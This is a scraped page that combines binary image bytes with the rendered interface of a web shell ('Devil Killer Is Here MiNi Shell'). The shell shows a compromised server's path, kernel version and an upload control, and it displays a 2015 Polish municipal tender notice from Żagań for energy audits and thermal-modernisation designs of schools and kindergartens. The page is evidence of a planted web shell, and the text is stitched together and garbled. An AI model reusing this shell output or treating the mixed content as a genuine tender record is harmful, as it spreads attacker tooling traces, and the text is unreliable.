JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20151014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20151014/149759-N-2015.html

<p class="kh_header"><b>Żagań: WYKONANIE DOKUMENTACJI TECHNICZNEJ TERMOMODERNIZACJI WRAZ Z AUDYTEM  ENEGETYCZNYM OBIEKTÓW UŻYTECZNOŚCI PUBLICZNEJ : ZESPÓŁ SZKÓŁ NR 1 W ŻAGANIU,  ZESPÓŁ SZKÓŁ NR 2 W ŻAGANIU,  MIEJSKIE PRZEDSZKOLE NR 2 W ŻAGANIU, MIEJSKIE PRZEDSZKOLE NR 3 W ŻAGANIU, W KONTEKŚCIE UBIEGANIA SIĘ O DOFINANSOWANIE W RAMACH RPO LUBUSKIE 2020</b><br>
<b>Numer ogłoszenia: 149759 - 2015; data zamieszczenia: 14.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żagań o Statusie Miejskim , Plac Słowiański 17, 68-100 Żagań, woj. lubuskie, tel. 68 4771040, faks 68 4771017.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.zagan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE DOKUMENTACJI TECHNICZNEJ TERMOMODERNIZACJI WRAZ Z AUDYTEM  ENEGETYCZNYM OBIEKTÓW UŻYTECZNOŚCI PUBLICZNEJ : ZESPÓŁ SZKÓŁ NR 1 W ŻAGANIU,  ZESPÓŁ SZKÓŁ NR 2 W ŻAGANIU,  MIEJSKIE PRZEDSZKOLE NR 2 W ŻAGANIU, MIEJSKIE PRZEDSZKOLE NR 3 W ŻAGANIU, W KONTEKŚCIE UBIEGANIA SIĘ O DOFINANSOWANIE W RAMACH RPO LUBUSKIE 2020.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie dokumentacji technicznej  termomodernizacji wraz z audytem energetycznym obiektów  użyteczności publicznej  :  Zespół Szkół nr 1 w Żaganiu, Zespół Szkół nr 2 w Żaganiu,  Miejskie Przedszkole nr 2 w Żaganiu, Miejskie Przedszkole nr 3 w Żaganiu, w kontekście ubiegania się o dofinansowanie w ramach RPO Lubuskie 2020.

3.1. Podstawowe dane techniczne dotyczące obiektów : 
Zespół Szkół nr 1 przy ulicy Żarskiej 1 w Żaganiu :
 - kubatura - 24387,00 m3
- powierzchnia budynku netto - 4260,00 m2
- liczba kondygnacji - (2, częściowo 3)
- liczba lokali - 71
- ogrzewanie z ciepłowni miejskiej
- konstrukcja budynku - technologia wielka płyta W-70
- rok budowy - 1964
Zespół Szkół nr 2 przy ul. Nocznickiego 18 w Żaganiu :
	- kubatura - 31200,00 m3
	- powierzchnia użytkowa netto - 10398 m3 
	- liczba kondygnacji - (zróżnicowanie, max. 5)
	- liczba lokali - 95 
	- kotłownia lokalna (gaz)
	- konstrukcja budynku - technologia wielka płyta W70
	- rok budowy 1974
Miejskie Przedszkole nr 2 przy ul. X-Lecia 13 w Żaganiu:
	- kubatura - 4392,00m3
	- powierzchnia użytkowa netto - 1464,00 m2
	- liczba kondygnacji - 2
	- liczba lokali - 16
	- kotłownia lokalna (gaz)
	- konstrukcja budynku - murowana (bloczki z bet. komórkowego 
          suporeks)
	- rok budowy - 1986 
Miejskie Przedszkole nr 3 przy ul. X-Lecia 24 w Żaganiu:
	- kubatura - 4635 m3
	- powierzchnia użytkowa netto - 1159 m2
	- liczba kondygnacji - 2
	- liczba lokali - 16
	- kotłownia lokalna (gaz )
	- konstrukcja budynku - murowana (bet. komórkowy suporeks)
	- rok budowy - 1984

3.2. PRIORYTETY DOTYCZĄCE OPRACOWANIA AUDYTÓW W KONTEKŚCIE UZYSKANIA DOFINANSOWANIA W RAMACH PROJEKTU RPO - LUBUSKIE 2020

1. Przy opracowywaniu audytów energetycznych i projektów termomodernizacji obiektów kluczowe będzie dostosowanie  ich do kryteriów  oceny projektów w ramach RPO - Lubuskie 2020. Podstawowym kryterium podlegającym ocenie będzie kryterium efektywności kosztowej w powiązaniu z osiąganymi efektami ekologicznymi w stosunku do planowanych nakładów finansowych. Oprócz powyższego o wsparciu takich projektów decydować będą także inne osiągane rezultaty w stosunku do planowanych nakładów finansowych (np. wielkość redukcji CO2). Wzmocnieniu efektów projektów służyć będzie wdrożenie inteligentnych systemów zarządzania energią w oparciu o technologie TIK (technologie informacyjne i komunikacyjne). 

Audyty energetyczne powinny zawierać kryteria dotyczące efektywności energetycznej  ujęte w Dyrektywie 2006/32/WE w sprawie efektywności końcowego wykorzystania energii i usług energetycznych. 
W zakresie głębokiej kompleksowej modernizacji energetycznej budynków preferowane będą projekty charakteryzujące się najlepszą efektywnością energetyczną, to jest projekty zwiększające efektywność energetyczną powyżej 60%, natomiast projekty z zakresu głębokiej, kompleksowej modernizacji energetycznej zwiększające efektywność energetyczną poniżej 25% nie będą kwalifikowały się do dofinansowania.
W zakresie głębokiej kompleksowej modernizacji energetycznej budynków preferowane będą projekty charakteryzujące się najlepszą efektywnością energetyczną, to jest projekty zwiększające efektywność energetyczną powyżej 60%, natomiast projekty z zakresu głębokiej, kompleksowej modernizacji energetycznej zwiększające efektywność energetyczną poniżej 25% nie będą kwalifikowały się do dofinansowania. 
Głęboka, tj. kompleksowa modernizacja energetyczna budynków użyteczności publicznej i budynków mieszkalnych wielorodzinnych wraz z wymianą wyposażenia tych obiektów na energooszczędne w zakresie związanym m.in. z: 
 - ociepleniem obiektu,
- wymianą okien, drzwi zewnętrznych oraz oświetlenia na energooszczędne, 
 - przebudową systemów grzewczych (wraz z wymianą i podłączeniem do źródła ciepła),  
- przebudowa systemów wentylacji i klimatyzacji, 
- instalacją OZE w modernizowanych energetycznie budynkach ,
- instalacja systemów chłodzących, w tym również z OZE. 
W szczególnie uzasadnionych przypadkach, tj. gdy osiągnięte zostanie znaczne zwiększenie efektywności energetycznej oraz gdy istnieją szczególnie pilne potrzeby (potencjalne usprawnienia powinny wynikać z audytu energetycznego sporządzonego dla danego budynku), wsparcie może zostać udzielone na inwestycje polegające na modernizacji/ wymianie dźwigów osobowych oraz osobowo - towarowych, jednak wyłącznie jako element kompleksowego projektu (koszty związane z wdrożeniem planowanych usprawnień, nie będą mogły stanowić podstawowego kosztu całej inwestycji) . Jednocześnie należy wskazać, iż inwestycje związane z wyposażeniem w windy budynków dotychczas ich pozbawionych, nie będą traktowane jako przedsięwzięcia służące poprawie efektywności energetycznej i w związku z powyższym, nie będą mogły uzyskać wsparcia w ramach Działania 3.2 Efektywność energetyczna. 

W odniesieniu do wymiany źródeł ciepła mają zastosowanie następujące zasady: 

1. Wsparte projekty muszą skutkować znaczną redukcją CO2 w odniesieniu do                istniejących instalacji (o co najmniej 30% w przypadku zamiany spalanego paliwa).
2. Inwestycje w tym zakresie powinny być zgodne z właściwymi przepisami unijnymi. Wspierane urządzenia do ogrzewania powinny od początku okresu programowania charakteryzować się obowiązującym od końca 2020 roku minimalnym poziomem efektywności energetycznej i normami emisji zanieczyszczeń, które zostały określone w środkach wykonawczych do dyrektywy 2009/125/WE z dnia 21 października 2009 r. ustanawiającej ogólne zasady ustalania wymogów dotyczących eko-projektu dla produktów związanych z energią.

3. Inwestycje w kotły spalające biomasę, w związku z dodatkową emisją pyłu, będą możliwe do realizacji pod warunkiem zastosowania wydajnych systemów spalania, czy efektywnych systemów wychwytywania pyłów. W tym zakresie szczególnie będą brane pod uwagę zapisy Dyrektywy Parlamentu Europejskiego i Rady 2008/50/WE z dnia 21 maja 2008 roku w sprawie jakości powietrza i czystszego powietrza dla Europy (Dz. U. UE L z dnia 11 czerwca 2008 r., Nr 152, str. 1) (Dyrektywa CAFE) oraz przepisy krajowe traktujące o ochronie powietrza. 
4. Priorytetowo wspierane będę projekty wykorzystujące odnawialne źródła energii.  
5. Wsparcia nie otrzymają projekty polegające na zainstalowaniu urządzeń grzewczych zasilanych węglem.
6. Wsparcie powinno być uwarunkowane wykonaniem inwestycji zwiększających efektywność energetyczną i ograniczających zapotrzebowanie na energię w budynkach, w których wykorzystywana jest energia ze wspieranych urządzeń, 

Preferowane będzie wsparcie udzielane poprzez ESCO - to jest podmioty będące dostawcami usług energetycznych w rozumieniu dyrektywy 2012/27/UE. 
Projekty powinny być uzasadnione ekonomicznie i społecznie oraz przeciwdziałać ubóstwu energetycznemu. W zakresie przeciwdziałania ubóstwu energetycznemu preferowane będą projekty realizowane np. na obszarach szczególnie zagrożonych występowaniem zjawiska ubóstwa energetycznego, projekty realizowane przez podmioty zarządzające mieszkaniami socjalnymi lub w sektorze budownictwa socjalnego. 
Przed rozpoczęciem prac remontowych lub termomodernizacyjnych, powinna zostać sporządzona inwentaryzacja przyrodnicza w zakresie występowania ptaków gatunków chronionych, w celu uniknięcia nieumyślnego zniszczenia schronień tych ptaków podczas prac budowlanych. W przypadku konieczności zniszczenia schronień ptaków gatunków chronionych należy zwrócić się do regionalnego dyrektora ochrony środowiska o wydanie stosownego zezwolenia, a także zapewnić tym ptakom zastępcze miejsca lęgowe. Podczas prowadzenia prac wskazane jest zawieszenie budek lęgowych w miejscach, w których dotychczas miały swoje lęgi ptaki gatunków chronionych. Termin i sposoby wykonywania tych prac powinien uwzględniać okres lęgów, rozrodu i hibernacji gatunków chronionych. W przypadku konieczności zamontowania kratek w otworach wentylacyjnych budynków, uniemożliwiających ptakom powrót do miejsc lęgowych, z których korzystały w poprzednich latach, inwestor winien zapewnić stosowne budki lęgowe. 
Wsparcie w ramach Działania 3.2 mogą również otrzymać projekty będące kontynuacją uprzednio zrealizowanych inwestycji związanych z podniesieniem efektywności energetycznej, których przedmiotem było np. wyłącznie docieplenie budynku, czy wymiana stolarki okiennej i drzwiowej. Będą to projekty stanowiące uzupełnienie inwestycji wymagających kontynuacji, których celem będzie zrealizowanie zaplanowanych działań wynikających z audytu energetycznego (np. włączenie do instalacji c.o. i c.w.u. odnawialnych źródeł energii, wymiana oświetlenia na energooszczędne, wymiana kotłów na urządzenia o większej sprawności itp.). 
Dla projektów infrastrukturalnych z zakresu budownictwa wspieranych ze środków RPO-Lubuskie 2020, wprowadzone zostaną minimalne wymogi dotyczące efektywności energetycznej lub też odpowiednie premie. Wymogi te zostaną określone w kryteriach wyboru projektów. 

Głęboka modernizacja energetyczna budynków użyteczności publicznych, w tym wykorzystanie instalacji OZE w modernizowanych energetycznie budynkach 
W ramach typu I będzie można uzyskać dofinansowanie m.in. na: 
- poprawę termoizolacyjności obiektów użyteczności publicznej poprzez docieplenie        przegród zewnętrznych, wymianę stolarki okiennej oraz drzwiowej, 
- zmniejszenie zapotrzebowania na energię budynków użyteczności publicznej poprzez  modernizację oświetlenia, w tym budowę inteligentnych energooszczędnych systemów oświetlenia, modernizację systemów c.o. oraz c.w.u, 
- instalację systemów monitorowania i zarządzania energią, 
- przebudowę systemów grzewczych (wraz z wymianą i podłączeniem do źródła ciepła) oraz wentylacji i klimatyzacji (w tym budowy układów odzysku ciepła z wywiewanego powietrza wentylacyjnego w nowobudowanych obiektach użyteczności publicznej oraz poddawanych gruntownej renowacji), 
- instalacje odnawialnych źródeł energii w modernizowanych energetycznie budynkach, 
- instalacje systemów chłodzących z możliwością wykorzystania OZE w modernizowanych   energetycznie budynkach, 
- przygotowanie audytów energetycznych dla sektora publicznego, stanowiących niezbędny element dla przeprowadzenia finansowanych inwestycji (jako kompleksowy element projektu), 
- inwestycje w kotły spalające biomasę lub ewentualnie paliwa gazowe - wyłącznie w szczególnie uzasadnionych przypadkach, gdy osiągnięte zostanie znaczne zwiększenie efektywności energetycznej oraz gdy istnieją szczególnie pilne potrzeby. 

W ramach RPO - Lubuskie 2020 mogą być realizowane projekty dotyczące budynków publicznych, których właścicielem jest samorząd terytorialny oraz podległe mu organy i jednostki organizacyjne, a także podmiotów realizujących przedsięwzięcia w wyżej wskazanych budynkach będących dostawcami usług energetycznych w rozumieniu dyrektywy 2012/27/UE. 
W ramach Działania 3.2 wsparcie uzyskają inwestycje związane z poprawą efektywności energetycznej budynków użyteczności publicznej, których właścicielem jest samorząd terytorialny oraz podległe mu organy i jednostki organizacyjne. Identyfikacja optymalnego zestawu działań zwiększających efektywność energetyczną w danym budynku dokonywana będzie na podstawie audytu energetycznego, który będzie stanowił element projektu wspieranego w ramach przedmiotowego Działania.

3.3. Zakres  przewidywanych  zadań obejmuje:
Opracowanie projektów  termomodernizacji dla poszczególnych ww. obiektów  stanowić ma również podstawę do uzyskania pozwolenia na budowę . Opracowanie projektowe obejmuje:
-   inwentaryzację budowlaną w zakresie niezbędnym do celów projektowych
-  wykonanie audytu energetycznego obiektu obejmującego  - termomodernizację bryły budynku, regulację systemów ogrzewania i wentylacji oraz przygotowania ciepłej wody użytkowej,
- projekt budowlany wykonawczy docieplenia obiektu i regulacji centralnego ogrzewania  z  ewentualnym uwzględnieniem modernizacji istniejących węzłów ciepłowniczych,
- przedmiary,
- kosztorysy inwestorskie,
- plany BIOZ  (dokumentacja dotycząca bezpieczeństwa i ochrony zdrowia  ze względu na  specyfikę obiektów budowlanych, jeśli jest wymagana przepisami),
- opracowanie specyfikacji technicznej wykonania i odbioru robót  w poszczególnych branżach,
- uzgodnienia opracowanych przez inspektora Ochrony P.poż. i Inspektora BHP 
Projektant załączy oświadczenie, że wersja elektroniczna dokumentacji projektowej zawiera wszystkie elementy wersji tradycyjnej  i jest kompletna  z punktu widzenia celu, któremu ma służyć. 

3.4. Szczegółowy zakres prac obejmuje : 

1. Wykonanie inwentaryzacji  Zakres rzeczowy  inwentaryzacji  
- opis techniczny z uwzględnieniem lokalizacji, rodzaju  i charakteru budynku, liczby   kondygnacji, jego wysokości i powierzchni,
- opis materiałów budowlanych, z jakich wykonane zostały poszczególne elementy      budynku,
- rzut działki w skali 1:500 z naniesionym budynkiem wraz z e schodami, tarasami, chodnikami,   śmietnikami, ogrodzeniem, podziemnymi i naziemnymi przyłączami i sąsiednią zabudową,
- zwymiarowane rzuty wszystkich kondygnacji zarówno naziemnych , jak i podziemnych, z zaznaczonymi instalacjami i urządzeniami sanitarnymi w skali 1:50 lub 1:100,
- rzut dachu w skali 1:50 lub 1:100 z naniesionymi elementami więźby, przewodami kominowymi i wentylacjami oraz sposobem odwodnienia,
- przekroje przez wszystkie kondygnacje z zaznaczonymi charakterystycznymi wysokościami charakterystycznych punktów (rzędnych posadzek, podestów klatek schodowych, tarasów, 
dachu, kominów, gzymsów, studzienek, murków i poziomu terenu),
- rysunki architektoniczno-budowlane elewacji z naniesieniem wszystkich jej elementów
- dokumentacja fotograficzna w postaci zdjęć

2.  Wykonanie audytów  energetycznych obiektów pod względem :
- ustalenia współczynników przenikania ciepła przegród budowlanych,
- ustalenia sprawności systemów ogrzewania,
- opisaniu i wykonaniu pomiarów systemu wentylacji,
- wykonaniu charakterystyki energetycznej budynku,
- zbiorcze  zestawienie i ocena obecnego stanu istniejącego budynku, 
- charakterystyka źródeł ciepła systemu ogrzewania i wentylacji,
- charakterystyka systemu podgrzewania wody,
- określenie wskaźników  emisji zanieczyszczeń poszczególnych systemów budynku,
- ustaleniu opłaty za 1 GJ energii na ogrzewanie  (w dniu sporządzania audytu),
- zaplanowanie optymalnego wariantu przedsięwzięcia termomodernizacji
- opracowanie sposobów zmniejszenia zużycia energii,
- oszacowanie opłacalności każdej z metod i wskazanie najbardziej opłacalnej dla danego 
obiektu

3. Opracowanie projektu termomodernizacji obiektów w zakresie wynikającym z audytu energetycznego w tym  opracowanie projektów branżowych wg potrzeb.

4. Opracowanie przedmiarów robót  i kosztorysów inwestorskich. Przedmiary robót i kosztorysy inwestorskie muszą zawierać zestawienia przewidywanych do wykonania robót podstawowych w kolejności technologicznej ich wykonania wraz z ich szczególnym opisem lub wskazaniem podstaw ustalających szczegółowy opis oraz wskazaniem właściwych specyfikacji technicznych wykonania i odbioru robót z wyliczeniem i zestawieniem ilości jednostek przedmiarowych robót podstawowych, wraz z podaniem założeń wyjściowych do kosztorysowania robót.

5. Opracowanie Specyfikacji technicznej wykonania i odbioru robót budowlanych. Specyfikacja musi dotyczyć konkretnych robót przewidzianych w projekcie oraz zawierać zbiory wymagań, które są niezbędne do określenia standardu i jakości wykonania robót, w zakresie wykonania robót budowlanych, właściwości wyrobów budowlanych  oraz oceny prawidłowości wykonania poszczególnych robót.

3.5. Dokumentacja projektowa powinna zawierać ( dla każdego z obiektów)  :
- kompleksowy audyt energetyczny  (w 3egz.),
- projekt budowlany wykonawczy termomodernizacji (z inwentaryzacją) z załączonym planem BIOZ  (należy  opracować i przekazać Zamawiającemu  w 6 egz.),
- specyfikacja techniczna wykonania i odbioru robót (w 3 egz.),
- kosztorysy inwestorskie (w 2 egz.),
- przedmiary robót (w 2 egz.).
Kompletną dokumentację projektową należy wykonać i dostarczyć Zamawiającemu również na nośniku elektronicznym CD w formacie PDF w 2egz. wraz z kosztorysami inwestorskimi i przedmiarami robót w formacie ath.

Wykonawca zobowiązuje się wykonać dokumentacje projektową  zgodnie  z:
- Ustawą z dnia 7 lipca 1994 r- Prawo budowlane (tj. Dz.U. z 2013 r poz 1409 z późn. z zm.);
- Rozporządzeniem Ministra Infrastruktury z dnia 25 kwietnia  2012  roku w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. z 2012 r. poz. 462 z zmianami);
-  Rozporządzeniem Ministra Infrastruktury z dnia z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania  planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz.U. z dnia 8 czerwca 2004 roku Nr 
130 poz.1389 ze zm);
- Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie     szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z dnia 16 września 2004 roku Nr 202 poz.2072 ze zm);
- Rozporządzeniem Ministra Infrastruktury z dnia 17 marca 2009 r., w sprawie     szczegółowego zakresu i form audytu energetycznego oraz części audytu remontowego,  wzorów kart audytów, a także algorytmu oceny opłacalności przedsięwzięcia  termomodernizacyjnego (Dz. U. z 2009 r. Nr 43, poz. 346 z późn. zm.).

3.6. Wykonawca składając ofertę  jest zobowiązany wyodrębnić koszt wykonania audytu energetycznego.

3.7. Dokumentacja techniczna (projekt budowlano-wykonawczy, specyfikacja techniczna, projekty organizacji ruchu, kosztorysy, przedmiary), stanowić będzie  przedmiot prawa autorskiego w rozumieniu ustawy z dnia 4 lutego 1994 r. o prawie autorskim i prawach pokrewnych. Z chwilą dokonania odbioru przedmiotu zamówienia Wykonawca będzie zobowiązany przenieść w całości majątkowe prawa autorskie do dysponowania przedmiotem zamówienia na Zamawiającego. W wyniku przeniesienia autorskich prawa majątkowych Zamawiający nabędzie wyłączne prawo do korzystania z przedmiotu zamówienia w pełnym zakresie, w jakikolwiek sposób, bez ograniczeń na wszystkich polach eksploatacji. Wykonawca  wyrazi zgodę na dokonywanie przez Zamawiającego lub na jego zlecenie wszelkich zmian, aktualizacji i uzupełnień w dokumentacji będącej przedmiotem zamówienia. Wszelkie prawa w trym zakresie przysługiwać będą Zamawiającemu..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.22.10.00-3, 71.32.00.00-7, 71.24.20.00-6, 71.24.50.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)  w zakresie  posiadania  przez Wykonawcę uprawnień do wykonywania  określonej działalności lub czynności, Zamawiający nie stawia żadnych szczególnych  wymagań,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2)  w zakresie posiadania wiedzy i doświadczenia Zamawiający uzna za spełniającego ten   wymóg tego Wykonawcę,  który w okresie ostatnich trzech  lat przed upływem składania  ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie,  wykonał :  
- co najmniej 2 projekty termomodernizacji w tym co najmniej jeden dotyczący termomodernizacji budynku użyteczności publicznej; 
- co najmniej dwa audyty energetyczne  wraz z projektem wykonawczym termomodernizacji budynku użyteczności publicznej, na łączną kwotę nie mniejszą niż 40 000.
 
Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie.
Na potwierdzenie spełnienia tego  warunku Wykonawca złoży wraz z  ofertą wykaz  wykonanych głównych  usług, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych,   w okresie ostatnich trzech lat przed upływem składania  ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie,  wraz z  podaniem ich wartości, przedmiotu, dat  wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy usługi  ujęte w wykazie usług głównych zostały wykonane należycie.. 
 
Za główną usługę Zamawiający uznaje : sporządzanie  projektów termomodernizacji, projektów termomodernizacji budynków użyteczności publicznej, audytów energetycznych wraz z projektami wykonawczymi termomodernizacji budynków użyteczności publicznej.  

Dowodami  są poświadczenia wystawione przez  podmiot, na rzecz którego Wykonawca  świadczył usługę z tym, że  poświadczenie  w odniesieniu do nadal wykonywanych usług 
okresowych lub ciągłych powinno być wydane nie wcześniej niż na 3 miesiące  przed upływem terminu składania ofert.   
W przypadku gdy Zamawiający jest podmiotem na rzecz którego usługi  wskazane w wykazie, zostały wcześniej wykonane, a w stosunku do których Zamawiający żąda poświadczeń,  Wykonawca nie ma obowiązku przedkładania  dowodów- poświadczeń. 
     
